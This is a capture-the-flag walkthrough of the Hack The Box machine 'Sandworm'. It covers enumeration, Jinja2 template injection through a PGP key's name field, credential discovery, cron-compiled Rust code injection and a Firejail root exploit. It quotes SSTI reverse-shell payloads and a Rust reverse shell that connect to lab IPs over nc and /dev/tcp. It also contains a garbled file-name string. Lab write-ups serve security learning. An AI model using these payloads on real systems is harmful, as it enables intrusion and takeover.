Sandworm - Walkthroughs

## User Flag ### NMAP Scan ```shell sudo nmap 10.10.11.218 -sC -sV Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-24 13:20 MDT Nmap scan report for ssa.htb (10.10.11.218) Host is up (0.14s latency). Not shown: 997 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA) |_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519) 80/tcp open http nginx 1.18.0 (Ubuntu) |_http-server-header: nginx/1.18.0 (Ubuntu) |_http-title: Did not follow redirect to https://ssa.htb/ 443/tcp open ssl/http nginx 1.18.0 (Ubuntu) |_http-server-header: nginx/1.18.0 (Ubuntu) |_http-title: Secret Spy Agency | Secret Security Service | ssl-cert: Subject: commonName=SSA/organizationName=Secret Spy Agency/stateOrProvinceName=Classified/countryName=SA | Not valid before: 2023-05-04T18:03:25 |_Not valid after: 2050-09-19T18:03:25 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 22.08 seconds ``` ### Initial Enumeration From the nmap scan I can see that this server has ports `80, 443` meaning its most likely a webserver. Navigating to https://10.10.11.218 gives us a webpage for Secret Spy Agency. ![[Pasted image 20230824132534.png]] I see that there is an About and Contact page. On the about page there is some information about the fictional Secret Spy Agency, but nothing useful. On the contact page there is a block to enter a PGP encryppted message, with a link to a guide page to learn about PGP. ![[Pasted image 20230824133554.png]] On this guide page there are a few boxes to test out PGP encryption, decryption and signing. ![[Pasted image 20230824133852.png]] There is a link to view the SSA's public key for use in sending them messages. ```shell -----BEGIN PGP PUBLIC KEY BLOCK----- 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 =P8U3 -----END PGP PUBLIC KEY BLOCK----- ``` Looking at all this information, hints to the fact that there is some sort of injection vulnerability. Of course this will require more testing. ### Testing out PGP Using this key I was able to start testing out the various PGP boxes on the website. I first wanted to test out the decryption message. To accomplish this I needed to create a private PGP key and use the SSA public key to encrypt a message that they could decrypt. I initially ran into problems with getting any program to recognize the SSA public key. [CyberChef](https://gchq.github.io/CyberChef/) has the ability to do PGP decryption/encryption. However, it could not recognize the SSA public key. I had to use a program called [GNU Privacy Assistant](https://www.gnupg.org/related_software/gpa/index.html) which was able to recognize the public key. Using this program I encrypted a message with their public key and tested it out on the site. ![[Pasted image 20230824140823.png]] It worked! I went through and test out the other boxes getting a message to decrypt with my private key and a message to verify I signed a message correctly. All of them produced successful results but didn't return anything obvious for exploitation. I also tried just encrypting a reverse shell to see if it would be that easy. However, that did not work. ### Directory Enumeration I decided to try and enumerate directories and see if anything hidden or not linked showed up. ```shell gobuster dir -u https://ssa.htb -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt -k =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: https://ssa.htb [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-1.0.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /about (Status: 200) [Size: 5584] /contact (Status: 200) [Size: 3543] /guide (Status: 200) [Size: 9043] /view (Status: 302) [Size: 225] [--> /login?next=%2Fview] /admin (Status: 302) [Size: 227] [--> /login?next=%2Fadmin] /login (Status: 200) [Size: 4392] /process (Status: 405) [Size: 153] /logout (Status: 302) [Size: 229] [--> /login?next=%2Flogout] /pgp (Status: 200) [Size: 3187] ``` I saw that there was a login page and a page called process. Navigating to the login page prompts for user credentials. ### Testing Directories #### Login Page ![[Pasted image 20230824151057.png]] Trying out possible default credentials, such as: `admin:admin`, `admin:password`, `admin:Password123!`, etc. doesn't work. #### Process Page I decided to look at the process page. Navigating to https://10.10.11.218/process shows this result. ![[Pasted image 20230824151415.png]] This says to me that its some sort of program that is looking for properly formatted data, such as a specific API call. Inspecting the source in Firefox and going to the debugging tab, we can see what gets posted to the server. ```JS $(function () { $('[data-toggle="tooltip"]').tooltip() }); $(document).ready(function() { $(".verify-form").submit(function(e) { e.preventDefault(); var signed_text = $("#signed_text").val(); var public_key = $("#public_key").val(); $.ajax({ type: "POST", url: "/process", data: { signed_text: signed_text, public_key: public_key }, success: function(result) { $("#signature-result").html(result); $("#signature-modal").modal("show"); } }); }); $("#signature-modal .btn-secondary").click(function() { $("#signature-modal").modal("hide"); }); }); ``` This showed me that the signed message verification box is using the process page to do the work. This seems like a valuable route to research. First I have to generate an PGP key, I can do this using [[gpg]] ### Further Testing out PGP ```shell gpg --gen-key gpg (GnuPG) 2.2.40; Copyright (C) 2022 g10 Code GmbH This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. gpg: keybox '/home/cwalker/.gnupg/pubring.kbx' created Note: Use "gpg --full-generate-key" for a full featured key generation dialog. GnuPG needs to construct a user ID to identify your key. Real name: Charlie Email address: [email protected] You selected this USER-ID: "Charlie <[email protected]>" Change (N)ame, (E)mail, or (O)kay/(Q)uit? O We need to generate a lot of random bytes. It is a good idea to perform some other action (type on the keyboard, move the mouse, utilize the disks) during the prime generation; this gives the random number generator a better chance to gain enough entropy. We need to generate a lot of random bytes. It is a good idea to perform some other action (type on the keyboard, move the mouse, utilize the disks) during the prime generation; this gives the random number generator a better chance to gain enough entropy. gpg: /home/cwalker/.gnupg/trustdb.gpg: trustdb created gpg: directory '/home/cwalker/.gnupg/openpgp-revocs.d' created gpg: revocation certificate stored as '/home/cwalker/.gnupg/openpgp-revocs.d/D4A5E742FC5C0D22DE92CDEB02A3185A4E04943E.rev' public and secret key created and signed. pub rsa3072 2023-09-11 [SC] [expires: 2025-09-10] D4A5E742FC5C0D22DE92CDEB02A3185A4E04943E uid Charlie <[email protected]> sub rsa3072 2023-09-11 [E] [expires: 2025-09-10] ``` Now that I have the key generated I can use them to sign a message and have the sight test the verification. I first have to export our public key with this command: ```shell gpg --armor --export [email protected] > pub_key.asc ``` Once there I can create the message file and sign and encrypt it with the SSA public key. ```shell echo "Hello this is a test" > message.txt gpg --clear-sign --output signed.asc message.txt ``` Saved in the file `signed.asc` is the signed text ```shell -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Hello this is a test -----BEGIN PGP SIGNATURE----- iQGzBAEBCgAdFiEE1KXnQvxcDSLeks3rAqMYWk4ElD4FAmT/p4IACgkQAqMYWk4E lD5y/wwAvPU3V608EC34BlI7qTB19KHKHxf9I1BtdjVVg4ovtmSkoTBj0XeL/Yma LUeWUu0O9FsvnhW9anrq7I58xuEm2gMkJs0sPpSLqWBN5iwHn8YA43LBvP5pZisN rOM01elwYO4fqgB8kGdDA+AlzVzQq5NOKGhBk6g9FFeATpPLkWTCZ3bjgI5khqoK 9mWA7C2ATO1L3JUCRdzBSuLAPnwyBR/aIQLwoE15XI+3PKOJWGBk8Q+GnYZ3CKAs 6qB9d5OavXniw0y3sr9uJM1Pe2fpRjcvtOYoIwaTjtbKSXAM2R/Q87NopOyNB/cV S5jrF4oqoy3Dkpodtagj/6mQifK8Jfva/UjjDj9TenvtoP1bPMOtRQVd4IkmJ1mw mqA5a1Y8EDFu3X28Qt6oyPc4WpSlQckAhIpruxIqaqgPJGmWAEZdEzn8DkpeAKnt BF+Uwt7SEhQqoZ06NevGqvz/bBzL66XAaLsCDv3wgLPFWacDkizkbzcuYG6cGTQz mDPZogmF =72ea -----END PGP SIGNATURE----- ``` I enter the exported public key and the signed message into the verification boxes. ![[Pasted image 20230911175200.png]] Clicking the `Verify Signature` button shows me this message ![[Pasted image 20230911175316.png]] ### Exploiting PGP and Flask I see that the verification succesfully used my keys. I searched how to exploit this. Searching for vulnerabilities in GNUGPG didn't return anything useful. I decided to research Flask, the service the site said it was powered by. After googling for [Flask](https://flask.palletsprojects.com/en/2.3.x/) Vulnerabilities and for Flask PGP exploits, I came across [Exploit Notes](https://exploit-notes.hdks.org/exploit/web/framework/python/flask-jinja2-pentesting/). there is a listing for Server Side Template Injections (SSTI) that exploits syntax. I found a way to test out the possibility of an SSTI on the site. ![[Pasted image 20230911183835.png]] #### Testing SSTI Vulnerability I decide to put the test in the message and the real name. Email address didn't seem possible as it needs to be in an email address format. I deleted the previous keys to simplify the encryption ```shell gpg --delete-keys [email protected] gpg --delete-secret-keys [email protected] ``` ```shell gpg --gen-key gpg (GnuPG) 2.2.40; Copyright (C) 2022 g10 Code GmbH This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Note: Use "gpg --full-generate-key" for a full featured key generation dialog. GnuPG needs to construct a user ID to identify your key. Real name: {{4*2}} Email address: [email protected] You selected this USER-ID: "{{4*2}} <[email protected]>" Change (N)ame, (E)mail, or (O)kay/(Q)uit? o We need to generate a lot of random bytes. It is a good idea to perform some other action (type on the keyboard, move the mouse, utilize the disks) during the prime generation; this gives the random number generator a better chance to gain enough entropy. We need to generate a lot of random bytes. It is a good idea to perform some other action (type on the keyboard, move the mouse, utilize the disks) during the prime generation; this gives the random number generator a better chance to gain enough entropy. gpg: revocation certificate stored as '/home/cwalker/.gnupg/openpgp-revocs.d/37E85FA3EEED5F51710D981AD00EF6A2629190D5.rev' public and secret key created and signed. pub rsa3072 2023-09-12 [SC] [expires: 2025-09-11] 37E85FA3EEED5F51710D981AD00EF6A2629190D5 uid {{4*2}} <[email protected]> sub rsa3072 2023-09-12 [E] [expires: 2025-09-11] ``` ```shell echo "{{3*2}}" > message.txt ``` `NOTE: I used diffrent multiplications to determine which was vulnerable` I generated the signed message and exported the public key. Entering in the knew values to test SSTI i get this response. ![[Pasted image 20230911185052.png]] As we can see the server executed our expression in the name section, not the message section, which was expected. Now we know we can exploit this section to get a reverse shell. #### Using Exploit for Reverse Shell On the Exploit Notes site we can see there are templates for reverse shells. ```python {{config.__class__.__init__.__globals__['os'].popen('mkfifo /tmp/ZTQ0Y; nc 10.0.0.1 443 0</tmp/ZTQ0Y | /bin/sh >/tmp/ZTQ0Y 2>&1; rm /tmp/ZTQ0Y').read()}} {{ request|attr('application')|attr('__globals__')|attr('__getitem__')('__builtins__')|attr('__getitem__')('__import__')('os')|attr('popen')('rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4444 >/tmp/f')|attr('read')() }} # Filter bypass - Base64 encode {{ self.__init__.__globals__.__builtins__.__import__('os').popen('echo "c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMy8xMjM0IDA+JjE=" | base64 -d | bash').read() }} ``` To be safe I decided to use the base64 encoded reverse shell just in case there is a filter that would prevent the code from being read properly. I used [Reverse Shell Generator](https://www.revshells.com/) to generate my shell and encode it. I start a listener using [[Pwncat-CS]] ![[Pasted image 20230911190411.png]] Usually [[Pwncat-CS]] will automatically upgrade a shell but sometimes the commands wont work and you will still have a downgraded shell. ### Investigating Reverse Shell The shell was successful! We can see that we are now the user Atlas. When investigating a new reverse shell, I like to explore the home directory of the user for files of information. Looking in the home directory of Atlas I saw `.config` and decided to investigate. ```shell $ ls -al total 44 drwxr-xr-x 8 atlas atlas 4096 Jun 7 13:44 . drwxr-xr-x 4 nobody nogroup 4096 May 4 15:19 .. lrwxrwxrwx 1 nobody nogroup 9 Nov 22 2022 .bash_history -> /dev/null -rw-r--r-- 1 atlas atlas 220 Nov 22 2022 .bash_logout -rw-r--r-- 1 atlas atlas 3771 Nov 22 2022 .bashrc drwxrwxr-x 2 atlas atlas 4096 Jun 6 08:49 .cache drwxrwxr-x 3 atlas atlas 4096 Feb 7 2023 .cargo drwxrwxr-x 4 atlas atlas 4096 Jan 15 2023 .config drwx------ 4 atlas atlas 4096 Sep 12 01:11 .gnupg drwxrwxr-x 6 atlas atlas 4096 Feb 6 2023 .local -rw-r--r-- 1 atlas atlas 807 Nov 22 2022 .profile drwx------ 2 atlas atlas 4096 Feb 6 2023 .ssh ``` Inside the config directories we find two additional directories ```shell $ ls firejail httpie ``` I decided to go down `httpie` first but I believe` firejail` will be needed or useful later. Going down the `httpie` directory, we find a config file called `admin.json` ```shell cat admin.json { "__meta__": { "about": "HTTPie session file", "help": "https://httpie.io/docs#sessions", "httpie": "2.6.0" }, "auth": { "password": "quietLiketheWind22", "type": null, "username": "silentobserver" }, "cookies": { "session": { "expires": null, "path": "/", "secure": false, "value": "eyJfZmxhc2hlcyI6W3siIHQiOlsibWVzc2FnZSIsIkludmFsaWQgY3JlZGVudGlhbHMuIl19XX0.Y-I86w.JbELpZIwyATpR58qg1MGJsd6FkA" } }, "headers": { "Accept": "application/json, */*;q=0.5" } } ``` We now have the login for a user: `silentobserver:quietLiketheWind22` I user pwncat to ssh to the machine in order to simplify upload and downloads ![[Pasted image 20230911192456.png]] From there I found the user flag in the home directory! ## Root Flag ### Initial Enumeration Using pwncat I am able to upload linpeas and pspy64 to run on the system. ![[Pasted image 20230912125830.png]] Linpeas returned a couple of interesting results, with one indicating a 95% chance of privilege escalation. We will investigate this one first. ![[Pasted image 20230912130742.png]] ![[Pasted image 20230912130614.png]] ```shell (remote) silentobserver@sandworm:/home/silentobserver/.local/bin$ ls -al total 12 drwxrwxr-x 2 silentobserver silentobserver 4096 Nov 22 2022 . drwx------ 4 silentobserver silentobserver 4096 Nov 22 2022 .. -rwxrwxr-x 1 silentobserver silentobserver 208 Nov 22 2022 flask ``` I see that there is nothing interesting inside this folder location except for the application the site is run on. It doesn't look like this will lead to anything. Investigating the files with the SUID bit set looks more promising. I see tipnet and firejail. I remember firejail from looking at the configs in Atlas's home directory. Googling [firejail](https://firejail.wordpress.com) , I find the homepage, I can see that its a security sandbox that is probably what I landed in for the initial reverse shell. ![[Pasted image 20230912132956.png]] ### SUID Investigation From the linpeas output I can see that the SUID bit is set and the owner is root. This means that no matter who starts the program, it will always be run as root. However, when launching it as silentobserver I get the following error: ```shell $ /usr/local/bin/firejail -bash: /usr/local/bin/firejail: Permission denied ``` From the linpeas output I can see that either root can run it or members of the jailer group. The output of /etc/groups shows us that atlas is a member of the jailer group. ```shell $ cat /etc/group ---SNIP--- jailer:x:1002:atlas mysql:x:120: silentobserver:x:1001: atlas:x:1000: _laurel:x:997: ``` Attempting to run firejail from inside the security sandbox that we landed in as the atlas user doesn't work for obvious reasons. Of course, we also need to know how to exploit this vulnerability to gain a root shell. After a quick google of Firejail exploits, I found a [vulnerability](https://www.openwall.com/lists/oss-security/2022/06/08/10) that exploits a function of the program to gain a root shell. Now that I have the exploit, I need a way to get access to the user atlas outside of the security sandbox. I decide to investigate tipnet and see if there is any useful routes for exploitation. ### Tipnet Investigation ![[Pasted image 20230912135813.png]] I can see that there are a few options to choose from. After running through all of them, only `a` and `e` produce outputs. The others all state that they are works in progress. #### Option a ![[Pasted image 20230914081208.png]] #### Option e ![[Pasted image 20230914081313.png]] When selecting option a I get a bunch of messages, however there is no useful information in these that would point me to an exploit. Option e does not provide any useful info either. I want to explore the tipnet folder some more, see if there is anything useful that might point me towards a possible exploit. In the folder there is a file called tipnet.d. When I cat it out I get this: ![[Pasted image 20230915065300.png]] ### Tipnet Exploitation It seems to be a configuration file for tipnet, and that these packages are run every time tipnet is run. I can see that when running `ls -al` I can see that I am able to write to `lib.rs` which could be a possible exploit. ![[Pasted image 20230915070110.png]] ```shell cat /opt/crates/logger/src/lib.rs ``` ```ruby extern crate chrono; use std::fs::OpenOptions; use std::io::Write; use chrono::prelude::*; pub fn log(user: &str, query: &str, justification: &str) { let now = Local::now(); let timestamp = now.format("%Y-%m-%d %H:%M:%S").to_string(); let log_message = format!("[{}] - User: {}, Query: {}, Justification: {}\n", timestamp, user, query, justification); let mut file = match OpenOptions::new().append(true).create(true).open("/opt/tipnet/access.log") { Ok(file) => file, Err(e) => { println!("Error opening log file: {}", e); return; } }; if let Err(e) = file.write_all(log_message.as_bytes()) { println!("Error writing to log file: {}", e); } } ``` The file extension `.rs` tells me that it is a rust file. Catting it out seems like it just logs tipnet actions. While exploring I have another connection terminal running pspy64 and I see that every 2 minutes the rust compiler is runs. ![[Pasted image 20230915074932.png]] This combined with the editable rust file might mean that I am able to provide my own rust code to run instead of the logging. I decided to google for a Rust reverse shell and found one on [GitHub](https://gist.github.com/GugSaas/512fc84ef1d5aefec4c38c2448935b01). ```rust // I couldn't find the owner of the exploit, anyone who knows can comment so I can give the credits ;) extern crate chrono; use std::fs::OpenOptions; use std::io::Write; use chrono::prelude::*; use std::process::Command; pub fn log(user: &str, query: &str, justification: &str) { let command = "bash -i >& /dev/tcp/10.10.16.4/1235 0>&1"; let output = Command::new("bash") .arg("-c") .arg(command) .output() .expect("not work"); if output.status.success() { let stdout = String::from_utf8_lossy(&output.stdout); let stderr = String::from_utf8_lossy(&output.stderr); println!("standar output: {}", stdout); println!("error output: {}", stderr); } else { let stderr = String::from_utf8_lossy(&output.stderr); eprintln!("Error: {}", stderr); } let now = Local::now(); let timestamp = now.format("%Y-%m-%d %H:%M:%S").to_string(); let log_message = format!("[{}] - User: {}, Query: {}, Justification", timestamp, user, query); let mut file = match OpenOptions::new().append(true).create(true).open("log.txsilentobserver:quietLiketheWind22t") { Ok(file) => file, Err(e) => { println!("Error opening log file: {}", e); return; } }; if let Err(e) = file.write_all(log_message.as_bytes()) { println!("Error writing to log file: {}", e); } } ``` Adding this reverse shell to the `lib.rs` and waiting for the compiler to run, allows us to gain the reverse shell. Watching pspy64 I saw that rust started to compile and my shell was gained shortly after. I am now the user `atlas` ![[Pasted image 20230915080433.png]] ### Exploit Firejail Now that I am atlas, I am a member of the jailer group and I can now run firejail and crucially the firejail exploit that should give me root access. I copied the exploit that I found earlier from [Openwall](https://www.openwall.com/lists/oss-security/2022/06/08/10/1) and created the `firejail.py` file in atlas's home directory. After running the exploit I see that it gives me a command to run in another shell. ![[Pasted image 20230915135913.png]] I press `Ctrl + Z` to background the argument and enter in the command it says. Once I am in that shell I run `su -` and I now have a root shell. ![[Pasted image 20230915140056.png]] I have the root flag now and the system is conquered.